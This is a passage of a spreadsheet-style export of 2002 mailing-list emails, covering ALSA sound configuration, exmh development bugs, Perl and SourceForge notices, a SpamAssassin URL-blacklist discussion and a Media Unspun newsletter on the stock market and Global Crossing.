    <t>I wish I could answer your question but my laptop does not have the digital stuff hooked up :( so I so not know about it. I have an excellent ESS Maestro3 which OSS supports pretty lame so I was forced to learn about ALSA. I have used these commands to explore ALSA and my chip: arecord -l   (list devices) arecord -L   (list PCM decices) I get some output like this: &gt; arecord -l card 0: MAESTRO3 [ESS Allegro PCI], device 0: Allegro [Allegro]   Subdevices: 1/1   Subdevice #0: subdevice #0 &gt; arecord -L PCM list:  (SNIP - craploads of output) I noticed that the output from this commands kind of maps to what the alsamixer or gamix have. For what it is worth, here is what I have in modules.conf for my sound stuff: &gt; ## ALSA portion &gt; alias char-major-116 snd &gt; ## OSS/Free portion &gt; alias char-major-14 soundcore &gt; &gt; ## ALSA portion &gt; alias snd-card-0 snd-maestro3 &gt; ## OSS/Free portion &gt; alias sound-slot-0 snd-card-0 &gt; &gt; ## OSS/Free portion - card #1 &gt; alias sound-service-0-0 snd-mixer-oss &gt; # BAD alias sound-service-0-1 snd-seq-oss &gt; alias sound-service-0-3 snd-pcm-oss &gt; # BAD alias sound-service-0-8 snd-seq-oss &gt; alias sound-service-0-12 snd-pcm-oss &gt; # &gt; ## ALSA Options (optional) &gt; options snd snd_major=116 snd_cards_limit=1 snd_device_mode=0666 &gt; options snd-maestro3 snd_index=0 snd_id=MAESTRO3 snd_amp_gpio=8 &gt; # &gt; ## OSS Options (optional) &gt; alias snd-card-1 off &gt; alias snd-card-2 off &gt; alias snd-card-3 off &gt; alias sound-slot-1 off &gt; alias sound-service-1-0 off &gt; &gt; ## Preserve Mixer Settings &gt; #post-install /usr/sbin/alsactl restore MAESTRO3 &gt; #pre-remove /usr/sbin/alsactl store MAESTRO3 &gt; post-install /usr/sbin/alsactl restore &gt; pre-remove /usr/sbin/alsactl store Hope that helps, good luck. Lance (lance_tt@bellsouth.net) wrote*: &gt; &gt;Hello, &gt; &gt;Thanks for these rpms, I removed the binary built from source (.tar.gz) &gt;and installed your SRPM of gamix.  One quick question, is there a way to &gt;switch between digital out and analog out with the ALSA driver and &gt;utilities, or, for that matter, with gamix?  I know with the OSS drivers &gt;I was using it was as simple as 'emu-config -d for digital and &gt;emu-config -a for analog, with the emu-tools package for SBLive!  I &gt;noticed there is SB Live Analog/Digital Output Jack in alsamixer but &gt;haven't figured out the key to use, if this is the right control in &gt;mixer.  Also, I tried to expand gamix to display all possible controls &gt;but it defaults back to 'Wave' and 'Music'  With LFE, Center, Surround &gt;and Playback under Wave (this is how I control output of front and rear &gt;speakers for digital out...'Surround' and 'Playback')  Under 'Music' &gt;there are two controls but unresponsive.  I have a tuner and cassette &gt;deck hooked up to an audio/video switch that goes into 'Line In' on the &gt;soundcard.  Again, with the OSS drivers, it was as simple as emu-config &gt;-d and emu-config -a.  Digital out for anything coming from the &gt;computer, analog out for the tuner and cassette deck.  I don't know if &gt;this is necessary to switch inbetween to get 'Line In' to work or not, &gt;but an expansion of gamix would help, where I could see all the &gt;controls.... &gt; &gt;Any help would be greatly appreciated and thanks again for the gamix &gt;rpms. &gt; &gt;Kind Regards, &gt; &gt;Lance &gt;-- &gt;: &gt;####[ Linux One Stanza Tip (LOST) ]########################### &gt; &gt;Sub : Command line shortcuts (clear)                 LOST #310 &gt; &gt;Tired of typing in "clear" every time you want the screen to &gt;be cleared ? Press [Ctrl-L] ... This works for  most shells, &gt;(except for ash, bsh and ksh) &gt; &gt;############################################# &gt;: &gt; -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 03 Sep 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-03</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (26 August / 1st September 2002)\n    * The Perl Review, v0 i5\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (26 August / 1st September 2002)        |\n|   posted by rafael on Monday September 02, @03:47 (summaries)      |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nThis week, we're back to our regularly scheduled p5p report, straight\nfrom my keyboard's mouth. Many thanks to Elizabeth Mattjisen who provided\nthe two previous reports, while I was away from p5p and from whatever\nmight evocate more or less a computer.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| The Perl Review, v0 i5                                             |\n|   posted by ziggy on Monday September 02, @14:20 (news)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]brian_d_foy writes "The latest issue of The Perl Review is ready:\n[1][URL]http://www.theperlreview.com[/URL]\n\n  * Extreme Mowing -- Andy Lester\n\n  * Perl Assembly Language -- Phil Crow\n\n  * What Perl Programmers Should Know About Java -- Beth Linker\n\n  * Filehandle Ties -- Robby Walker\n\n  * The Iterator Design Pattern -- brian d foy\n    Enjoy!"\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.theperlreview.com[/URL]\n    1. [URL]http://www.theperlreview.com[/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use.perl.org http://use.perl.org http://www.theperlreview.com http://use.perl.org http://www.theperlreview.com http://www.theperlreview.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 03 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Tue, 03 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-03</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (26 August / 1st September 2002)\n    posted by rafael on Monday September 02, @03:47 (summaries)\n    [URL]http://use.perl.org[/URL]\n\nThe Perl Review, v0 i5\n    posted by ziggy on Monday September 02, @14:20 (new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rpm-zzzlist@freshrpms.net\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Tue, 01 Oct 2002 23:49:35 +0000</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 23:49:35 +0000</t>
  </si>
  <si>
    <t>Matthias Saou (matthias@egwn.net) wrote*: &gt;As Red Hat does, I really don't recommend trying to upgrade between betas &gt;or from a beta to a final release either. Simply backup your /home, /etc &gt;(and /root and/or /usr/local/ if needed) then reinstall cleanly, it'll &gt;probably save a few hassles and you'll get the cleanest possible system ;-) &gt; I think this is probably the best way, because I think (maybe) with upgrading you do not always automatically get the latest feature enabled in some config file because RH would rather take it easy and not update that config file (you get a rpmnew instead of rpmsaved file) so they get less calls to support that way. Anyway, I have tons of media files in /home/* probably 5 to 10 gigs at least, my laptop's CDROM takes 700MB at a time (obviously) and compressing media files is dumb because they are already compressed. Dumb question: how to backup huge data? Network backup to another box? I do not have a box with a tape drive, but maybe box with a large HD with much free space could take the backup (oops, I do not have a space computer with a large HD with much free space). These media files are backed up - ON THE CD'S THEY CAME FROM! Yes I learned that used CDs make inexpensive backup copy on the shelf. I do not want to re-rip all this crap again. -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Tue, 01 Oct 2002 23:22:14 -0500</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 23:22:14 -0500</t>
  </si>
  <si>
    <t>Bindings problem with current CVS code</t>
  </si>
  <si>
    <t>I've had this binding in my ~/.exmh/exmhbindings for years: set {bindings(key,Flist_FindUnseen 1 ; Inc_PresortFinish)}  After updating to the current code in CVS I get "bad key f" when  I hit the "f" key.  I can open the Bindings... Commands window  and define the binding.  It then works until I restart exmh. I suspect a parsing problem/change.  I'll try to look into this  tomorrow unless someone knows where the problem might be. --Hal _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Hal DeVore &lt;haldevore@acm.org&gt;\nDate: Tue, 01 Oct 2002 23:21:21 -0500</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 23:21:21 -0500</t>
  </si>
  <si>
    <t>Unseen window versus Sequences Window</t>
  </si>
  <si>
    <t>I apologize for not catching up to the current code in so long.\n\nNow that I have I'm trying to resolve "breakage" and differences.\n\nThe unseen window seems to have been replaced with the sequences \nwindow.  While I appreciate the flexibility of the sequences \nwindow, the unseen window filled an important-to-me need:  It \nwas tiny and could be set to show on all desktops of a virtual \nwindow manager without taking a lot of space.  Since my normal \nmode of operation involves two copies of exmh displaying on a \n1024x768 vnc session, screen space is at a premium.\n\nAs things stand now, I have a sequences window that shows a lot\nmore information than I need to have handy and takes up a lot \nmore room than I can "spare".\n\nI can see that I could like the new sequences window a lot for \ncertain operations.  But I'd like a nice uncluttered, tiny \nwindow that _only_ shows me info on my unread mail.\n\nOne possibility that occurs to me would be a button or mouse\nclick that "shrinks" the Sequences window to show only the\nsequences in the "always show" list.  And of course a way to \nexpand it back.\n\n--Hal\n\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Tue, 01 Oct 2002 21:29:21 +1200</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 21:29:21 +1200</t>
  </si>
  <si>
    <t>I remember apt-get dist-upgrading from 7.2 to 7.3 fine, so it -should-  work, maybe :) --On Tuesday, October 01, 2002 10:27:47 +0200 Thomas Vander Stichele   wrote: &gt; It might be, don't think anyone tried it yet.                                     -- \m/ --   "...if I seem super human I have been misunderstood." (c) Dream Theater          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: shiva+qpopper-webdev@sewingwitch.com\nFrom: mailman-owner@lists.sourceforge.net\nDate: Tue, 01 Oct 2002 17:08:10 -0700</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 17:08:10 -0700</t>
  </si>
  <si>
    <t>mailman-owner@lists.sourceforge.net</t>
  </si>
  <si>
    <t>shiva+qpopper-webdev@sewingwitch.com</t>
  </si>
  <si>
    <t>(SPAM? 08.00) lists.sourceforge.net mailing list memberships reminder</t>
  </si>
  <si>
    <t>******************************************************************************* \n\n\nThis is an official mailing from SourceForge.net.  You are receiving\nthis message because you had previously subscribed to one of the more\nthan 20,000 opt-in mailing lists managed by SourceForge.net for the\nprojects hosted on SourceForge.net.  This message is a monthly\nsubscription reminder, automatically generated by the Mailman mailing\nlist management software used by SourceForge.net\n([URL]http://www.list.org[/URL]\n\nDO NOT REPLY to this email; instructions are provided here for\nunsubscribing from a list, and for obtaining support.  Support is not\nprovided by email.\n\nTo UNSUBSCRIBE:\n 1. Use your web browser to access the list management URL for the\n    list you wish to unsubscribe from (the list management URL for\neach\n    list may be found at the bottom of this email).\n 2. If you do not already know your list management password, click on\nthe\n    'Email My Password To Me' button.  List passwords will differ from\n    list-to-list, and are different from the password you use on the\n    SourceForge.net site, if you have an account there.\n 3. From the list management page, enter your list password (see step\n#2,\n    above, if you do not know your list password) in to the\n    'Unsubscribing from...' box, found in the upper right-hand corner\nof\n    the list management page.\n 4. After entering the password for your subscription and clicking on\nthe\n    'Unsubscribe' button, you will be unsubscribed from the list\nimmediately.\n 5. To unsubscribe from more than one list, you must access the\nmanagement\n    page for each, using the appropriate URL, listed at the bottom of\nthis\n    email.\n\nTo contact SUPPORT staff:\n 1. All mailing lists hosted by SourceForge.net are opt-in via a\nthree-way\n    handshake.  This is not a spam list; subscription to this list\n    required you to respond to a confirmation email that was sent to\nyour\n    email address.\n 2. SourceForge.net provides hosting for more than 20,000 different\n    mailing lists; if you contact our support staff, you must provide\n    A) the email address associated with this monthly mailing AND\n    B) the list of mailing lists from the bottom of this mailing\n    Without this information, it will be difficult to assist you.\n 3. Support is not provided by email.  All support inquiries related\nto\n    this mailing should be submitted as a Support Request at this URL:\n    [URL]https://sourceforge.net[/URL]\n    Proper issue reporting will help us to respond quickly.\n\nTo change your subscription settings:\n 1. Make use of the list management URL and password for the list\n    in question; from the list management page, you may change your\n    password or subscription preferences.\n 2. If you do not already know your list management password, click on\nthe\n    'Email My Password To Me' button.  List passwords will differ from\n    list-to-list, and are different from the password you use on the\n    SourceForge.net site, if you have an account there.\n\nIf your email address is changing:\n 1. Access the URL provided for list management at the bottom of this\nemail.\n 2. Click on the name of the list, located at the bottom of the list\n    management page (the link preceding the email address for the list\nadmin).\n 3. Follow the instructions in the 'Subscribing to...' section to\nsubscribe\n    your NEW email address to the list.\n 4. Once subscribed, follow the instructions in the UNSUBSCRIBE\nsection\n    (above) to unsubscribe the old address from the list in question.\n NOTE: There is no means to change the email address on your\nsubscriptions\n directly; use this procedure to change the subscriptions for each of\nthe\n lists you subscribe to.\n\nIf you are a list ADMINISTRATOR and have lost your list admin\npassword:\n 1. Follow the instructions in the SUPPORT section of this message\n(above)\n    to request a reset of your list admin password.  Please include a\nlist\n    of the mailing lists whose passwords you need reset.  No automated\n    facility is provided to reset list admin passwords.\n\nPlease note: As of 2002-08-20, this mailing will no longer include the\nlist management passwords for your subscriptions.  If you have lost\nyour list management password, you will need to recover those\npasswords on a per-list basis as described in #2 of the UNSUBSCRIBE\nsection, above.\n\nIf you encounter a problem in accessing the mailing list management\npage for a list, please contact the SourceForge.net team (see our\nSUPPORT instructions, above) for assistance AFTER you try using a\ndifferent web browser for accessing that page.\n\nThank you,\n\nthe SourceForge.net team\n\n\n(mailing list management URLs follow)\n*******************************************************************************\n\n\nThis is a reminder, sent out once a month, about your\nlists.sourceforge.net mailing list memberships.  It includes your\nsubscription info and how to use it to change it or unsubscribe from a\nlist.\n\nYou can visit the URLs to change your membership status or\nconfiguration, including unsubscribing, setting digest-style delivery\nor disabling delivery altogether (e.g., for a vacation), and so on.\n\nIn addition to the URL interfaces, you can also use email to make such\nchanges.  For more info, send a message to the '-request' address of\nthe list (for example, qpopper-webdev-request@lists.sourceforge.net)\ncontaining just the word 'help' in the message body, and an email\nmessage will be sent to you with instructions.\n\nIf you have questions, problems, comments, etc, send them to\nmailman-owner@lists.sourceforge.net.  Thanks!\n\nSubscriptions for shiva+qpopper-webdev@sewingwitch.com:\n\nList                                     // URL    \n----                                     --------  \nqpopper-webdev@lists.sourceforge.net    \n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.list.org https://sourceforge.net https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Hal DeVore &lt;haldevore@acm.org&gt;\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Tue, 01 Oct 2002 14:14:57 +0700</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 14:14:57 +0700</t>
  </si>
  <si>
    <t>Date:        Mon, 30 Sep 2002 14:53:33 -0500     From:        Hal DeVore      Message-ID:  &lt;3703.1033415613@dimebox.bmc.com&gt;   | I vote for this being added to CVS, any objections? No, but using PickMarkSeen (and pick(ids)) as an alternative to just doing 	Seq_Del $exmh(folder) $mhProfile(unseen-sequence) $results seems unnecessary to me (that's all that PickMarkSeen does after all). (That can be done via "busy") Of course, the same is true of the badly named Pick_MarkSeen which has nothing at all to do with "pick" except that it (ab)uses the pick(ids) var in the same way.   (Its name would be hard to change unfortunately, as it is known in app-defaults files for the "Catch Up Unseen" menu item, but its implementation could certainly be fixed). kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: SpamTalk &lt;SpamTalk@US.NET56.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 01 Oct 2002 10:51:56 +0100</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 10:51:56 +0100</t>
  </si>
  <si>
    <t>SpamTalk &lt;SpamTalk@US.NET56.net&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] URL blacklist</t>
  </si>
  <si>
    <t>SpamTalk said:\n&gt; Probably better than the "spam phrases" approach would be the database\n&gt; approach as currently used for white/black listing.\n&gt; Any way to tie that to an XML retrieval from a list of central repositories?\n&gt; Does mySQL do replication? A properly done XML would let us eyeball the list\n&gt; as well as use it to keep the database up to date.\n&gt; Another idea: could we synthesize an RBL so that\n&gt; [URL]http://www.spammer.com[/URL] becomes spam.web.bug.x.[URL]www.spammer.com[/URL]\n&gt; for a reverse lookup? It is going to get tricky, how to specify a randomized\n&gt; intermediate directory?\n\nA good plan, needs an implementation though: \n\n        [URL]http://bl.reynolds.net.au[/URL]\n\nhmm. seems down to me.  Basically it's a plan to store hash sums of\nURLs/phone numbers found in spam in a DNSBL, for apps like SpamAssassin to\nlook up.  A little like spamcop's "spamvertized URL" list...\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: DEDICATED SERVERS only $89!\nLinux or FreeBSD, FREE setup, FAST network. Get your own server \ntoday at [URL]http://www.ServePath.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.spammer.com www.spammer.com http://bl.reynolds.net.au http://www.ServePath.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: Eugen Leitl &lt;eugen@leitl.org&gt;, forkit! &lt;fork@spamassassin.taint.org&gt;\nFrom: "B.K. DeLong" &lt;bkdelong@pobox.com&gt;\nDate: Tue, 01 Oct 2002 10:05:59 -0400</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 10:05:59 -0400</t>
  </si>
  <si>
    <t>"B.K. DeLong" &lt;bkdelong@pobox.com&gt;</t>
  </si>
  <si>
    <t>Eugen Leitl &lt;eugen@leitl.org&gt;, forkit! &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: MIT OpenCourseWare</t>
  </si>
  <si>
    <t>At 05:38 PM 9/30/2002 +0200, Eugen Leitl wrote:\n\n\n&gt;Looks useful. Hopefully, they'll put up some more material soon.\n&gt;\n&gt;         [URL]http://ocw.mit.edu[/URL]\n\nI'll be sure to keep everyone posted on the next update. :)\n\n\n--\nB.K. DeLong\nbkdelong@ceci.mit.edu\nOpenCourseWare\n\n+1.617.258.0360\n+1.617.877.3271 (cell)</t>
  </si>
  <si>
    <t>To: zzz-unspun@example.com\nFrom: "Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;\nDate: Tue, 01 Oct 2002 09:26:14 -0400</t>
  </si>
  <si>
    <t>Tue, 01 Oct 2002 09:26:14 -0400</t>
  </si>
  <si>
    <t>Market Can't Find Its Bottom With Both Hands</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format... ------------=_1033478774-12610-4 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit To view this newsletter in full-color, visit: [URL]http://newsletter.mediaunspun.com[/URL] Media Unspun What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] ----------------------------------------------------------------- October 1, 2002 ----------------------------------------------------------------- IN THIS ISSUE ----------------------------------------------------------------- * MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS * WINNICK: HANDS-OFF OR RED-HANDED? * OTHER STORIES ----------------------------------------------------------------- EDITOR'S NOTE ----------------------------------------------------------------- Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more  successful we are, the more useful we can be to you. Pass it on!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 MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS ----------------------------------------------------------------- Remember when Nasdaq 2500 seemed impossibly low? Welcome back to  cruel reality. These days, with few analysts willing to call a market bottom, financial reporters outdo each other with dire assessments of how bad things are and how much worse they can get. Maybe Morrissey should do a concert on Wall Street; the self-pity can't get much worse. The markets' closing numbers were the same in every city, but you wouldn't know it from the headlines. It was the Dow's worst monthly performance in four years, said MSNBC. "3rd quarter worst for stocks since '87," read the Denver Post, repeating a popular figure reached by tallying the Dow and S&amp;P's percentage losses. The New York Daily News counted percentage losses for the month only and declared it the worst September since 1937. Everyone predicted a lousy September 2002, so the phrase "self-fulfilling prophecy" does spring to mind.  So does the phrase "gloom and doom." "Every day for the last three months, the market has erased $73 of wealth, including Saturdays, Sundays and holidays, for every person living in the United States," said the San Jose Mercury News. "Countless investors are starting to wonder if stocks will ever go up again," wrote USA Today. In a more plausible statement, TheStreet.com's Aaron Task said recent declines "demonstrated once again the folly of investors' repeated attempts to pinpoint  a bottom" and "disabuse(d) them of the idea that the best time to buy is when things look worst, if only because recent history  has shown stocks can go from terrible to awful and beyond."  OK, breathe. Go read the comics or something. Feeling better? Good, because there's more. The New York Post, in small enough words for everyone to understand, made the public service announcement "Beware! October Is A Very Bad Month For The Stock Market." And you shouldn't take candy from strangers, either. The Post's John Crudele, a market curmudgeon before it was in style, warned, "This market is very dangerous, even if things look like they couldn't get any worse." Detroit Free Press columnist Susan Tompor agreed that "the next round of statements could indeed look pretty nasty."  We have to agree: the stock market is bad. The economy is bad. It's going to get worse before it gets better, and that may take  a while. The "bottom" is, technically, zero. Be cautious, yes, but don't let the media's bipolar disorder ruin your day. Just like dot-coms weren't really a new economy, a bear market isn't the end of the world. - Jen Muehlbauer No Happy Endings in September  [URL]http://www.thestreet.com[/URL] Bear drags stocks deeply into den [URL]http://www.usatoday.com[/URL] Market's September is worst since 1937  [URL]http://www.nydailynews.com[/URL] Dow posts worst month in 4 years [URL]http://www.msnbc.com[/URL] Market's Worst Quarter Since '87 Crash Limps to a Close [URL]http://www.nytimes.com[/URL] For Dow and S&amp;P, Worst Quarter Since '87  [URL]http://www.washingtonpost.com[/URL] 3rd quarter worst for stocks since '87 (Denver Post) [URL]http://tinyurl.com[/URL] Market's tumble persists, capping worst three months in 15 years [URL]http://www.siliconvalley.com[/URL] Stock Market Quarterly Review [URL]http://online.wsj.com[/URL],,2_0861,00.html (Paid subscription required.) Beware! October Is A Very Bad Month For The Stock Market  [URL]http://www.nypost.com[/URL] SUSAN TOMPOR: Bad news is, the beating isn't over yet  [URL]http://www.freep.com[/URL] ----------------------------------------------------------------- ADVERTISEMENT ----------------------------------------------------------------- What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription: [URL]https://ziffdavis.omeda.com[/URL] ----------------------------------------------------------------- WINNICK: HANDS-OFF OR RED-HANDED? ----------------------------------------------------------------- Former Global Crossing chairman Gary Winnick will appear before a Congressional committee today. It won't be pretty. CNN predicted he will plead the Fifth. Most other outlets expected Winnick to testify. Impetus for all the coverage was yesterday's release by the House Energy and Commerce Committee of memos indicating that Winnick was in the thick of the company's suspect dealmaking. A committee spokesman said, "If he tries to portray himself as an out-of-the-loop ceremonial chairman, we intend to remind him that he is under oath." The memo that got most of the attention was one from then-CEO Leo Hindery to Winnick in June 2001. Hindery warned in colorful language that the company was heading for a fall. The Financial Times, Washington Post, and New York Times all ran a quote from the memo comparing telcos to salmon. Hindery urged Winnick to unload the company -- "without looking like we are shaking our bootie all over the world," quoted the two Timeses -- and resigned shortly thereafter. One little detail from the memos is guaranteed to make Winnick's  time under the television lights even more uncomfortable. Among the companies he used his influence with, to help close deals, was Enron. All the reports mentioned Enron, but the New York Times seemed to be alone in noting that Global Crossing never completed a deal with the fallen energy giant. The Wall Street Journal looked beyond the obviously embarrassing  details of the memos to point out that, despite such evidence, the gun might not be smoking yet. "Prosecutors would still need to prove that he knew the transactions were improper and used them mainly as a way of enriching himself by boosting the company's stock price artificially," the Journal reporters wrote. The AP noted that all of the memos were dated after Winnick's last sale of Global Crossing stock, $123 million in May 2001. Despite his $734 million in stock profits, Gary Winnick was not among the five telco executives being sued by New York attorney general Eliot Spitzer to return their ill-gotten gains. Is Spitzer betting, with the Journal, that Winnick might walk away clean? - Keith Dawson Global Crossing: What Did Winnick Know? [URL]http://www.cnn.com[/URL] Winnick Was Told Of Telecom Risks [URL]http://www.washingtonpost.com[/URL] Memo Indicates Global Crossing Chief Knew of Troubles [URL]http://www.nytimes.com[/URL] Global Crossing's Winnick Knew About Swap Deals [URL]http://online.wsj.com[/URL],,SB1033426396710785953,00.html (Paid subscription required) Documents show active role by Global Crossing chairman (AP) [URL]http://www.bayarea.com[/URL] Suit Seeks IPO Profits From Five Executives [URL]http://www.washingtonpost.com[/URL] ----------------------------------------------------------------- OTHER STORIES ----------------------------------------------------------------- Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe) [URL]http://tinyurl.com[/URL] AOL Chairman's No. 1 Ally Turns Into His Biggest Foe [URL]http://www.nytimes.com[/URL] More living without benefits: Health insurance given less frequently at work   [URL]http://www.freep.com[/URL] Beware al-Qaida, Branch is on to you (Battle Creek Enquirer) [URL]http://tinyurl.com[/URL] Hewlett-Packard and EMC Sue Each Other (Reuters) [URL]http://www.nytimes.com[/URL] Dealing With W [URL]http://www.nytimes.com[/URL] Broadband Disconnect [URL]http://www.washingtonpost.com[/URL] Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP) [URL]http://www.washingtonpost.com[/URL] Microsoft Puts Meat Behind Security Push [URL]http://www.eweek.com[/URL],3959,561985,00.asp ----------------------------------------------------------------- Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com  today. ----------------------------------------------------------------- STAFF ----------------------------------------------------------------- Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com).  Marketing: Cowpoke Productions (cowpokeproductions.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________________ POWERED BY: [URL]http://www.imakenews.com[/URL] To be removed from this list, use this link: [URL]http://www.imakenews.com[/URL] To receive future messages in HTML format, use this link: [URL]http://www.imakenews.com[/URL] To change your subscriber information, use this link: [URL]http://www.imakenews.com[/URL] ------------=_1033478774-12610-4 Content-Type: text/html; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit     Media Unspun   Pass it on... 					 					What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] 					 					 				 				 					 					 						 							Tuesday, October 1, 2002 						 					 					 					 				 Top Spins... 			 						 				 			 			Market Can't Find Its Bottom With Both Hands 			 				 			 			 			 			 			 						 				 			 			Winnick: Hands-Off or Red-Handed? 			 				 			 			 			 			 			 						 				 			 			Other Stories 			 				 			 			 			 			 			 			 			 			 			 			Editor's Note 			 			 			 Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!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Sponsor Pop!Tech 2002 October 18 - 20, 2002: Camden, Maine Join 500 big thinkers to discuss the collision of technology and culture Register now at: [URL]http://www.poptech.org[/URL]  			 			 			 			 			 			Market Can't Find Its Bottom With Both Hands 			 			 			 Remember when Nasdaq 2500 seemed impossibly low? Welcome back to cruel reality. These days, with few analysts willing to call a market bottom, financial reporters outdo each other with dire assessments of how bad things are and how much worse they can get. Maybe Morrissey should do a concert on Wall Street; the self-pity can't get much worse. The markets' closing numbers were the same in every city, but you wouldn't know it from the headlines. It was the Dow's worst monthly performance in four years, said MSNBC. "3rd quarter worst for stocks since '87," read the Denver Post, repeating a popular figure reached by tallying the Dow and S&amp;P's percentage losses. The New York Daily News counted percentage losses for the month only and declared it the worst September since 1937. Everyone predicted a lousy September 2002, so the phrase "self-fulfilling prophecy" does spring to mind.  So does the phrase "gloom and doom." "Every day for the last three months, the market has erased $73 of wealth, including Saturdays, Sundays and holidays, for every person living in the United States," said the San Jose Mercury News. "Countless investors are starting to wonder if stocks will ever go up again," wrote USA Today. In a more plausible statement, TheStreet.com's Aaron Task said recent declines "demonstrated once again the folly of investors' repeated attempts to pinpoint a bottom" and "disabuse(d) them of the idea that the best time to buy is when things look worst, if only because recent history has shown stocks can go from terrible to awful and beyond."  OK, breathe. Go read the comics or something. Feeling better? Good, because there's more. The New York Post, in small enough words for everyone to understand, made the public service announcement "Beware! October Is A Very Bad Month For The Stock Market." And you shouldn't take candy from strangers, either. The Post's John Crudele, a market curmudgeon before it was in style, warned, "This market is very dangerous, even if things look like they couldn't get any worse." Detroit Free Press columnist Susan Tompor agreed that "the next round of statements could indeed look pretty nasty."  We have to agree: the stock market is bad. The economy is bad. It's going to get worse before it gets better, and that may take a while. The "bottom" is, technically, zero. Be cautious, yes, but don't let the media's bipolar disorder ruin your day. Just like dot-coms weren't really a new economy, a bear market isn't the end of the world. - Jen Muehlbauer No Happy Endings in September  [URL]http://www.thestreet.com[/URL]  Bear drags stocks deeply into den [URL]http://www.usatoday.com[/URL]  Market's September is worst since 1937  [URL]http://www.nydailynews.com[/URL]  Dow posts worst month in 4 years [URL]http://www.msnbc.com[/URL]  Market's Worst Quarter Since '87 Crash Limps to a Close [URL]http://www.nytimes.com[/URL]  For Dow and S&amp;P, Worst Quarter Since '87  [URL]http://www.washingtonpost.com[/URL]  3rd quarter worst for stocks since '87 (Denver Post) [URL]http://tinyurl.com[/URL]  Market's tumble persists, capping worst three months in 15 years [URL]http://www.siliconvalley.com[/URL]  Stock Market Quarterly Review [URL]http://online.wsj.com[/URL],,2_0861,00.html  (Paid subscription required.) Beware! October Is A Very Bad Month For The Stock Market  